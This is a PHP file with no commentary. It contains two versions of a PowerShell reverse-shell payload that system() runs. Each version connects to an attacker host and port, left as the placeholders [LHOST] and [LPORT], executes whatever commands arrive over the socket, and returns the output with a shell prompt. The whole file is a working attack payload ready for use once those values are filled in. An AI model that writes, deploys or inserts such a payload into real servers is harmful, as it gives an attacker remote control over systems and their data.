<?php 
	$str = "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('[LHOST]',[LPORT]);";
	$str .= "\$stream = \$client.GetStream();";
	$str .= "[byte[]]\$bytes = 0..65535|%{0};";
	$str .= "while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;";
	$str .= "\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);";
	$str .= "\$sendback = (iex \$data 2>&1 | Out-String );";
	$str .= "\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';";
	$str .= "\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);";
	$str .= "\$stream.Write(\$sendbyte,0,\$sendbyte.Length);";
	$str .= "\$stream.Flush()};\$client.Close()\"";
	system($str);
?>

<?php 
$str = "powershell -nop -c 
\"\$client = New-Object System.Net.Sockets.
TCPClient('[LHOST]',[LPORT]);
\$stream = \$client.GetStream();
[byte[]]\$bytes = 0..65535|%{0};
while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;
\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);
\$sendback = (iex \$data 2>&1 | Out-String );
\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';
\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);
\$stream.Write(\$sendbyte,0,\$sendbyte.Length);
\$stream.Flush()};\$client.Close()\"";
$str = str_replace("\n", "", $str);
system($str);
?>